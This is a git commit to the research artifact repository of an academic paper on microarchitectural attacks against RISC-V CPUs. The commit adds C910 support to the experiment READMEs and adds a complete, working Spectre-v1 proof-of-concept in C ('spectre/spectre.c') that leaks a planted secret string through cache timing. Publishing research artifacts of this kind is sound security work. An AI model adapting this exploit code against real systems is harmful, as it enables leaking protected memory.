add C910

Author: lukas

README.md

@@ -1,19 +1,28 @@
 # Artifacts for A Security RISC
-This repository contains the artifacts for the IEEE S&P 2023 paper "A Security RISC: Microarchitectural Attacks on Hardware RISC-V CPUs". You can find the paper at the [CISPA website](https://cispa.de/en/research/publications/3924-a-security-risc-microarchitectural-attacks-on-hardware-risc-v-cpus).
+This repository contains the artifacts for the IEEE S&P 2023 paper "A Security RISC: Microarchitectural Attacks on Hardware RISC-V CPUs". You can find the paper on the [CISPA website](https://cispa.de/en/research/publications/3924-a-security-risc-microarchitectural-attacks-on-hardware-risc-v-cpus).
+
 
 ## Supported Processors and Distributions
-Currently the experiments are tested on both the Alwinner C906 and SiFive U74 processors. 
-You can find implementations specific to each of the two processors in the `./C906` and `./u74` subfolders. 
-Software specifications from our paper:
-- The C906 processors used run Debian 12 with with the kernels 5.14.0-rc4-nezha (Nezha) and 5.4.61 (Lichee RV).
-- The U74 processors on the VisionFive board run Ubuntu 22.04.1 LTS with the 5.17.5-visionfive kernel 
+Currently, the experiments are tested on both the Alwinner C906, C910 and SiFive U74 processors. 
+Processor specifications from our paper, C910 processor was added afterwards:
+
+| Processor | Manufacturer | Distro             | Kernel                                       |
+|-----------|--------------|--------------------|----------------------------------------------|
+| C906      | Allwinner    | Debian 12          | 5.14.0-rc4-nezha (Nezha), 5.4.61 (Lichee RV) |
+| C910      | Allwinner    | Ubuntu 23.04       | 5.10.113-g52fbe8443ea1-dirty                 |
+| U74       | SiFive       | Ubuntu 22.04.1 LTS | 5.17.5-visionfive                            |
+
 
 ## Utils
-We provide a `riscsc.h` header file that bundles a few useful instructions for all experiments.
-To use the header, simply add `#include "riscsc.h"` to your code, after copying the header to your path. 
+We provide a `rlibsc.h` header file that bundles a few useful instructions for all experiments.
+To use the header, simply add `#include "rlibsc.h"` to your code, after copying the header to your path. 
 
 ## Materials
 Each subfolder contains a README on how to run the specific experiment. We provide source code for the following experiments: 
+
+### Additional Materials
+- `spectre`: Spectre exploit on the C910 processor
+
 ### Case Studies
 - `access-retired`: Discovers hidden files on a system by monitoring the ammount of retired instructions. This code is used during the Dropbox case study. 
 - `zigzagger`: Code for the zigzagger case study showing that it is possible to distinguish the branch direction of zigzagger protected code via the count of retired instructions. 
@@ -26,9 +35,9 @@ Each subfolder contains a README on how to run the specific experiment. We provi
 - `evict_reload_histrogram`: Generates a histrogram for an Evict+Reload covert channel 
 - `fence_flush_histogram`: Generates a histrogram for an Flush+Reload attack on the I-Cache using the `fence.i` instruction.  
 - `fgprime_probe_histrogram`: Optimized Prime+Probe for the C906 making use of the FIFO relacement strategy to achive highter transfer rates. 
-- `iflush_reload_histogram`: Generates a Flush+Reload histogram using the `icache.iva` instruction on the C906. 
-- `flush_reload_histogram`: Generates a Flush+Reload histogram using the `dcache.iva` instruction on the C906. 
-- `flush_flush_histogram`: Generates a Flush+Flush histogram using the `dcache.iva` instruction on the C906. 
+- `iflush_reload_histogram`: Generates a Flush+Reload histogram using the `icache.iva` instruction on the C906 and C910. 
+- `flush_reload_histogram`: Generates a Flush+Reload histogram using the `dcache.iva` instruction on the C906 and C910. 
+- `flush_flush_histogram`: Generates a Flush+Flush histogram using the `dcache.iva` instruction on the C906 and C910. 
 - `prime_probe_histogram`: Histrogram for a Prime+Probe attack. 
 - `tlb_evict_histogram`: Code to genereate a histogram showing that it is possible to evict TLB entries. 
 - `spectre-v1`: Histogram that shows that code is spculatively fetched, enabling our Cache+Time attack. 

access-retired/README.md

@@ -9,4 +9,4 @@ Build the PoC using `make`, and create the inaccessible folder using `make prepa
 Then run `./main`. 
 
 ## Works on 
-C906, U74
+C906, U74, C910

fence-flush/README.md

@@ -7,4 +7,4 @@ To flush, the PoC uses the `fence.i` instruction which flushes the entire instru
 Run `make` then `./hist`
 
 # Works on 
-C906,U74
+C906,U74,C910

flush-fault/README.md

@@ -8,4 +8,4 @@ Run `make` then `./flush-fault` or `./flush-ret`.
 Afterward, execute `python3 stats.py flush-fault` or `python3 stats.py flush-ret`.
 
 # Works on 
-C906,U74
+C906,U74,C910

flush_flush_histogram/README.md

@@ -7,4 +7,4 @@ To flush, the PoC uses the custom C906 instruction `dcache.civa` which flushes a
 Run `make` then `./hist`
 
 # Works on 
-C906 (because custom cache flush instruction)
+C906,C910 (because custom cache flush instruction)

flush_reload_histogram/README.md

@@ -7,4 +7,4 @@ To flush, the PoC uses the custom C906 instruction `dcache.civa` which flushes a
 Run `make` then `./hist`
 
 # Works on 
-C906 (because custom cache flush instruction)
+C906, C910 (because custom cache flush instruction)

iflush_reload_histogram/README.md

@@ -7,4 +7,4 @@ To flush, the PoC uses the custom C906 instruction `icache.iva` which flushes a
 Run `make` then `./hist`
 
 # Works on 
-C906 (because custom cache flush instruction)
+C906, C910 (because custom cache flush instruction)

iflush_reload_histogram/hist.c

@@ -32,7 +32,7 @@ void measure_hits(void *address, size_t *histogram,
       histogram[hit]++;
   }
 }
-‚
+
 void measure_misses(void *address, size_t *histogram,
                     size_t number_of_measurements) {
   for (size_t i = 0; i < number_of_measurements; i++) {

inst-cycles/README.md

@@ -5,4 +5,4 @@ Measure the execution time (in cycles) of instructions.
 Simply `make; ./main`
 
 # Works on 
-C906,U74
+C906,U74,C910

interrupt-timing/README.md

@@ -7,4 +7,4 @@ To test that the attacker works you will have to send network interrupts to the
 To test, run the program and from a different machine run `ping -s 50000 -i 3 <target machine ip>`.
 
 # Works on 
-C906,U74
+C906,U74,C910

page-walk/README.md

@@ -6,4 +6,4 @@ This experiment shows that a page table walk does not issue additional instructi
 Run `make` followed by `./main`
 
 ## Works on 
-U74 (timing difference and retired instruction difference), C906 (timing difference)
+U74 (timing difference and retired instruction difference), C906 and C910 (timing difference)

rlibsc.h

@@ -98,7 +98,7 @@ static inline void maccess(void *addr) {
 // ------------------------------
 // C906 specific implementaions +
 // ------------------------------
-#ifdef C906
+#if defined(C906) || defined(C910)
 
 // Flushes virtual address from the D-Cache
 static inline void flush(void *addr) {

spectre/Makefile

@@ -0,0 +1,7 @@
+all: spectre
+
+spectre: spectre.c
+	gcc spectre.c -Os -o spectre
+	
+clean:
+	rm -f spectre

spectre/README.md

@@ -0,0 +1,10 @@
+# Spectre
+A simple demonstration of Spectre data leakage. 
+Only works on cores with speculative execution.
+
+# Run Code
+Run `make` then `./spectre`. 
+You should see the leaked string `Spectre on RISC-V hardware!`
+
+# Works on 
+C910

spectre/spectre.c

@@ -0,0 +1,133 @@
+#define C910 
+
+#include <stdio.h>
+#include <string.h>
+#include <time.h>
+#include <assert.h>
+#include <stdint.h>
+#include <stdlib.h>
+#include "../rlibsc.h" 
+
+#define BENIGN_SIZE 50
+
+#define SECRET "Spectre on RISC-V hardware!"
+#define SECRET_SIZE (sizeof(SECRET) - 1)
+#define CACHE_HIT_THRESHOLD 120
+
+#define PAGE_SIZE 2048
+#define PROBE_SIZE (256 * PAGE_SIZE)
+#define CACHE_LINE_SIZE 64
+
+int buf_size = BENIGN_SIZE;
+uint8_t cache_barrier1[512] = {0};
+// init with values as this prevents nasty reordering
+char victim[BENIGN_SIZE] = {1,2,3,4,5};
+uint8_t cache_barrier2[512] = {0};
+char probe_array[PROBE_SIZE];
+uint8_t cache_barrier3[512];
+char secret_data[SECRET_SIZE];
+
+
+void init() {
+  srandom(time(NULL));
+  for (int i = 0; i < PROBE_SIZE; i++) {
+    probe_array[i] = (char) random();
+  }
+  strncpy(victim, "THIS_IS_BENIGN_CONTENT!", BENIGN_SIZE);
+  strncpy(secret_data, SECRET, SECRET_SIZE);
+
+  // prevent optimizing of cache barriers
+  printf("%s", cache_barrier1);
+  printf("%s", cache_barrier2);
+  printf("%s", cache_barrier3);
+}
+
+char read_content(int idx) {
+  if (idx >= 0 && idx < buf_size) {
+    int tmp = victim[idx];
+    return probe_array[tmp << 11];
+  } else
+    return 0;
+}
+
+
+int leak_byte(int offset, char* leak) {
+  // assert that we actually need to access out-of-bound that
+  //printf("got offset: %d\n", offset);
+  assert(offset > 0 && offset > buf_size);
+  int junk = 1337;
+
+  int hits[256] = {0};
+
+  for (int j = 0; j < 150; j++) {
+    // train by accessing in-bound
+    for (int i = 50; i > 0; i--)  {
+      junk ^= read_content(0);
+    }
+
+    // flush probe array from cache
+    for (int i = 0; i < PROBE_SIZE; i += CACHE_LINE_SIZE) {
+      flush(probe_array + i);
+    }
+
+
+    fence();
+    int x;
+    int training_x = random() % BENIGN_SIZE;
+    int malicious_x = offset;
+    // access pattern: 5 training runs and 1 out-of-bound access
+    for (int i = 0; i < 1; i++) {
+      flush(&buf_size);
+      fence();
+      // bit magic to prevent using a conditional jump
+      x = ((j % 6) - 1) & ~0xFFFF;   /* Set x=FFF.FF0000 if j%6==0, else x=0 */
+      x = (x | (x >> 16));           /* Set x=-1 if j&6=0, else x=0 */
+      x = training_x ^ (x & (malicious_x ^ training_x));
+      junk ^= read_content(x);
+    }
+
+    unsigned int junk2 = 0;
+    unsigned long long int before, after;
+    unsigned long long int elapsed[256] = {0};
+    int idx;
+    for (int i = 0; i < 256; i++) {
+      idx = (i * 167 + 13) & 255;
+      before = rdcycle(&junk2);
+      junk += probe_array[idx * PAGE_SIZE];
+      after = rdcycle(&junk2);
+      elapsed[idx] = after - before;
+      if (elapsed[idx] < CACHE_HIT_THRESHOLD && idx != training_x) {
+        hits[idx]++;
+        //printf("got hit for %c\n", idx);
+      }
+    }
+  }
+
+  char best_char = 0;
+  int best_count = 0;
+  for (int i = 30; i < 127; i++) {
+    if (hits[i] > best_count) {
+      best_char = i;
+      best_count = hits[i];
+    }
+  }
+  printf("i: 0x%x  \t c: %4c  \t hit-count: %5d\n", best_char,
+      best_char, best_count);
+  *leak = best_char;
+  return junk;
+}
+
+#define NO_BYTES_TO_LEAK SECRET_SIZE
+
+int main() {
+  init();
+  int junk = 0;
+  char leaked[NO_BYTES_TO_LEAK + 1] = {0};
+  for (int i = 0; i < NO_BYTES_TO_LEAK; i++) {
+    char curr_leak;
+    junk ^= leak_byte(secret_data - victim + i, &curr_leak);
+    leaked[i] = curr_leak;
+    printf("curr leak: %s\n", leaked);
+  }
+  return junk;
+}

square-multiply/README.md

@@ -7,5 +7,5 @@ As only a single measurement is performed the timing can be unstable (especially
 Run `make` then `./main`
 
 # Works on
-C906, U74
+C906, U74, C910
 

timer-evaluation/README.md

@@ -6,4 +6,4 @@ To run the main timer benchmark simply run `make; ./main` this should print a ta
 To check the timer increment run `make; ./timer-resulution` which should give the timer increments for each counter. 
 
 ## Works on
-C906, U74
+C906, U74, C910

tlb_evict_histogram/README.md

@@ -6,4 +6,4 @@ To evict, the PoC simply accesses 10 addresses on different pages forcing one ad
 Simply `make; ./hist` should produce an output simmilar to the one below. 
 
 ## Works on
-C906, U74
+C906, U74, C910

zigzagger/README.md

@@ -6,4 +6,4 @@ The asm.S file contains the target assembly code implementing the mitigation.
 Simply run `make` and then `./main` you should see an output simmilar to the one displayed below.
 
 ## Works on 
-C906,U74
+C906,U74,C910